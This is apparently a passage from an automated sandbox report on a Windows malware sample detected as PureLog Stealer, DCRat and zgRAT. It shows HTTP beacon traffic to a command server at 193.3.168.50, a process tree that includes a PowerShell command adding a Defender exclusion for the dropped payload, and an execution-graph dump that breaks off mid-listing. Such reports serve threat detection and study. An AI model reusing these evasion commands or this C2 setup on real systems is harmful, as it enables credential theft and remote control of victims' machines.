    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 193.3.168.50
    Content-Length: 1060
    Expect: 100-continue
Dec 5, 2024 10:54:49.523631096 CET | 1060 | OUT | Data Raw: (hex dump omitted)
Dec 5, 2024 10:54:50.396166086 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:54:50.629112005 CET | 200 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 05 Dec 2024 09:54:50 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 4;Y\W0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
71 | 192.168.2.4 | 49939 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:54:50.871925116 CET | 441 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 193.3.168.50
    Content-Length: 1060
    Expect: 100-continue
    Connection: Keep-Alive
Dec 5, 2024 10:54:51.221606016 CET | 1060 | OUT | Data Raw: (hex dump omitted)
Dec 5, 2024 10:54:52.109564066 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:54:52.345233917 CET | 200 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 05 Dec 2024 09:54:51 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 4;Y\W0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
72 | 192.168.2.4 | 49942 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:54:52.741838932 CET | 441 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 193.3.168.50
    Content-Length: 1056
    Expect: 100-continue
    Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
73 | 192.168.2.4 | 49946 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:54:53.219307899 CET | 441 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 193.3.168.50
    Content-Length: 1936
    Expect: 100-continue
    Connection: Keep-Alive
Dec 5, 2024 10:54:53.565650940 CET | 1936 | OUT | Data Raw: (hex dump omitted)
Dec 5, 2024 10:54:54.440152884 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:54:54.673150063 CET | 349 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 05 Dec 2024 09:54:54 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: (hex dump of chunked response body omitted)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
74 | 192.168.2.4 | 49947 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:54:53.367682934 CET | 441 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 193.3.168.50
    Content-Length: 1056
    Expect: 100-continue
    Connection: Keep-Alive
Dec 5, 2024 10:54:53.721549988 CET | 1056 | OUT | Data Raw: (hex dump omitted)
Dec 5, 2024 10:54:54.605053902 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:54:54.837070942 CET | 200 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 05 Dec 2024 09:54:54 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 4;Y\W0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
75 | 192.168.2.4 | 49951 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:54:55.090745926 CET | 417 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 193.3.168.50
    Content-Length: 1060
    Expect: 100-continue
Dec 5, 2024 10:54:55.576205969 CET | 1060 | OUT | Data Raw: (hex dump omitted)
Dec 5, 2024 10:54:56.332887888 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:54:56.564897060 CET | 200 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 05 Dec 2024 09:54:56 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 4;Y\W0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
76 | 192.168.2.4 | 49955 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:54:56.808407068 CET | 417 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 193.3.168.50
    Content-Length: 1060
    Expect: 100-continue
Dec 5, 2024 10:54:57.159410954 CET | 1060 | OUT | Data Raw: (hex dump omitted)
                                                                                                                  Dec 5, 2024 10:54:58.047489882 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:54:58.281289101 CET200INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:54:57 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 4;Y\W0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
77 | 192.168.2.4 | 49961 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:54:59.176068068 CET | 441 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 193.3.168.50
Content-Length: 1060
Expect: 100-continue
Connection: Keep-Alive
Dec 5, 2024 10:54:59.534157038 CET | 1060 | OUT | Data Raw: 5f 5c 5f 5b 5c 59 5f 55 5a 58 51 52 55 55 5a 53 50 5f 5d 59 59 53 57 48 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
Data Ascii: _\_[\Y_UZXQRUUZSP_]YYSWH^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.Y;6=*(Z "./=Y#)(S-?\0,4$>;!3(*#G $],-


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
78 | 192.168.2.4 | 49966 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:54:59.811508894 CET | 441 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 193.3.168.50
Content-Length: 1936
Expect: 100-continue
Connection: Keep-Alive
Dec 5, 2024 10:55:00.160885096 CET | 1936 | OUT | Data Raw: 5f 5f 5a 5e 5c 59 5a 5f 5a 58 51 52 55 5e 5a 5d 50 55 5d 53 59 59 57 49 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
Data Ascii: __Z^\YZ_ZXQRU^Z]PU]SYYWI^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.[- =)<[4&,<-Z4:(,3+[$ =Z'8D"#(==#G $],
Dec 5, 2024 10:55:01.052923918 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:55:01.285175085 CET | 349 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 Dec 2024 09:55:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 39 38 0d 0a 09 11 25 10 25 2b 3c 1e 30 12 37 18 3c 20 38 5b 39 30 38 03 27 3d 29 0b 25 39 3f 11 3d 3a 27 11 21 5b 2a 5a 3c 29 33 53 3f 27 09 0f 29 02 20 58 00 1a 25 00 20 22 01 02 2c 39 34 13 26 03 04 17 26 3d 29 5a 3e 39 0d 18 29 30 28 53 25 07 29 09 2b 30 25 16 3b 0a 3d 59 3a 2e 2a 5c 24 2f 2a 52 0e 17 22 0e 28 2e 23 02 22 32 29 13 28 31 06 04 3c 06 3b 56 30 38 21 0a 37 3d 25 56 33 09 2a 0b 25 32 31 0a 27 06 05 10 31 3c 33 04 29 29 20 5f 2e 05 20 57 00 31 57 54 0d 0a 30 0d 0a 0d 0a
Data Ascii: 98%%+<07< 8[908'=)%9?=:'![*Z<)3S?') X% ",94&&=)Z>9)0(S%)+0%;=Y:.*\$/*R"(.#"2)(1<;V08!7=%V3*%21'1<3)) _. W1WT0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
79 | 192.168.2.4 | 49967 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:54:59.939574003 CET | 441 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 193.3.168.50
Content-Length: 1056
Expect: 100-continue
Connection: Keep-Alive
Dec 5, 2024 10:55:00.284395933 CET | 1056 | OUT | Data Raw: 5a 5b 5a 59 5c 5b 5f 53 5a 58 51 52 55 57 5a 5e 50 50 5d 5f 59 52 57 42 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
Data Ascii: Z[ZY\[_SZXQRUWZ^PP]_YRWB^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.X/*+8 )81X79(T-?$?$#!=Z',5'*-#G $],1
Dec 5, 2024 10:55:01.177547932 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:55:01.413055897 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 Dec 2024 09:55:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4;Y\W0


Target ID: 0
Start time: 04:52:53
Start date: 05/12/2024
Path: C:\Users\user\Desktop\file.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\file.exe"
Imagebase: 0xe30000
File size: 2'331'371 bytes
MD5 hash: C9059DFB76AD9E011D4E11608CCC98CC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1644868327.000000000523A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1643679277.00000000068D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 1
Start time: 04:52:54
Start date: 05/12/2024
Path: C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WScript.exe" "C:\MsContainer\P69CZ8d7qXWcyOsB66pHSLt72y6yplqEAs.vbe"
Imagebase: 0xdf0000
File size: 147'456 bytes
MD5 hash: FF00E0480075B095948000BDC66E81F0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 2
Start time: 04:53:05
Start date: 05/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c ""C:\MsContainer\GHGhSTUsO1Bq4f5yX2eWVB.bat" "
Imagebase: 0x240000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 04:53:05
Start date: 05/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 04:53:05
Start date: 05/12/2024
Path: C:\MsContainer\chainportruntimeCrtMonitor.exe
Wow64 process (32bit): false
Commandline: "C:\MsContainer/chainportruntimeCrtMonitor.exe"
Imagebase: 0x570000
File size: 2'009'600 bytes
MD5 hash: 38514F88AFF517EA6BE4724D24B28FE2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000000.1762447136.0000000000572000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
• Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1801521334.0000000012BCD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\MsContainer\chainportruntimeCrtMonitor.exe, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\MsContainer\chainportruntimeCrtMonitor.exe, Author: Joe Security
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 58%, ReversingLabs
Reputation: low
Has exited: true

Target ID: 8
Start time: 04:53:08
Start date: 05/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe'
Imagebase: 0x800000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 9
Start time: 04:53:08
Start date: 05/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 10
Start time: 04:53:08
Start date: 05/12/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\hlVW2PE0oG.bat"
Imagebase: 0x7ff633620000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

                                                                                                                  Target ID:11
                                                                                                                  Start time:04:53:08
                                                                                                                  Start date:05/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:12
                                                                                                                  Start time:04:53:08
                                                                                                                  Start date:05/12/2024
                                                                                                                  Path:C:\Windows\System32\chcp.com
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:chcp 65001
                                                                                                                  Imagebase:0x7ff6911d0000
                                                                                                                  File size:14'848 bytes
                                                                                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:13
                                                                                                                  Start time:04:53:09
                                                                                                                  Start date:05/12/2024
                                                                                                                  Path:C:\Windows\System32\PING.EXE
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:ping -n 10 localhost
                                                                                                                  Imagebase:0x7ff70a9a0000
                                                                                                                  File size:22'528 bytes
                                                                                                                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:14
                                                                                                                  Start time:04:53:09
                                                                                                                  Start date:05/12/2024
                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  Imagebase:0xf80000
                                                                                                                  File size:2'009'600 bytes
                                                                                                                  MD5 hash:38514F88AFF517EA6BE4724D24B28FE2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000E.00000002.2910935301.0000000003B02000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000E.00000002.2910935301.000000000384A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000E.00000002.2910935301.0000000003529000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe, Author: Joe Security
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  • Detection: 58%, ReversingLabs
                                                                                                                  Has exited:false

                                                                                                                  Target ID:15
                                                                                                                  Start time:04:53:10
                                                                                                                  Start date:05/12/2024
                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  Imagebase:0x960000
                                                                                                                  File size:2'009'600 bytes
                                                                                                                  MD5 hash:38514F88AFF517EA6BE4724D24B28FE2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:17
                                                                                                                  Start time:04:53:11
                                                                                                                  Start date:05/12/2024
                                                                                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                  Imagebase:0x7ff693ab0000
                                                                                                                  File size:496'640 bytes
                                                                                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:18
                                                                                                                  Start time:04:53:17
                                                                                                                  Start date:05/12/2024
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                  Imagebase:0x7ff6eef20000
                                                                                                                  File size:55'320 bytes
                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  Target ID:19
                                                                                                                  Start time:04:53:18
                                                                                                                  Start date:05/12/2024
                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe"
                                                                                                                  Imagebase:0x3e0000
                                                                                                                  File size:2'009'600 bytes
                                                                                                                  MD5 hash:38514F88AFF517EA6BE4724D24B28FE2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true


Execution Graph

Execution Coverage: 9.6%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 9.2%
Total number of Nodes: 1510
Total number of Limit Nodes: 44
execution_graph
API calls 23832->23844 23833->23587 23834->23832 23837 e4ec50 23836->23837 23838 e3a1ed DeleteFileW 23837->23838 23839 e3a200 23838->23839 23840 e3977f 23838->23840 23841 e3bb03 GetCurrentDirectoryW 23839->23841 23840->23587 23842 e3a214 23841->23842 23842->23840 23843 e3a218 DeleteFileW 23842->23843 23843->23840 23844->23833 23851 e3d9b0 23845->23851 23848 e3e645 SetDlgItemTextW 23848->23599 23849 e3e66b LoadStringW 23849->23848 23850 e3e682 LoadStringW 23849->23850 23850->23848 23856 e3d8ec 23851->23856 23853 e3d9cd 23854 e3d9e2 23853->23854 23864 e3d9f0 26 API calls 23853->23864 23854->23848 23854->23849 23857 e3d904 23856->23857 23858 e3d984 _strncpy 23856->23858 23860 e3d928 23857->23860 23865 e41da7 WideCharToMultiByte 23857->23865 23858->23853 23863 e3d959 23860->23863 23866 e3e5b1 50 API calls __vsnprintf 23860->23866 23867 e56159 26 API calls 3 library calls 23863->23867 23864->23854 23865->23860 23866->23863 23867->23858 23869 e4b31e 23868->23869 23870 e4b3f0 ExpandEnvironmentStringsW 23869->23870 23871 e4b40d 23869->23871 23870->23871 23871->23603 23872->23603 23873->23603 23874->23624 23875->23603 23876->23603 23877->23603 23879 e58e54 23878->23879 23880 e58e61 23879->23880 23881 e58e6c 23879->23881 23891 e58e06 23880->23891 23883 e58e74 23881->23883 23889 e58e7d _abort 23881->23889 23884 e58dcc _free 20 API calls 23883->23884 23887 e58e69 23884->23887 23885 e58ea7 HeapReAlloc 23885->23887 23885->23889 23886 e58e82 23898 e591a8 20 API calls _abort 23886->23898 23887->23603 23889->23885 23889->23886 23899 e57a5e 7 API calls 2 library calls 23889->23899 23892 e58e44 23891->23892 23897 e58e14 _abort 23891->23897 23901 e591a8 20 API calls _abort 23892->23901 23894 e58e2f RtlAllocateHeap 23895 e58e42 23894->23895 23894->23897 23895->23887 23897->23892 23897->23894 23900 e57a5e 7 API calls 2 library calls 23897->23900 23898->23887 23899->23889 23900->23897 23901->23895 23903 e40666 _wcslen 23902->23903 23930 e317e9 23903->23930 23905 e4067e 23905->23628 23907 
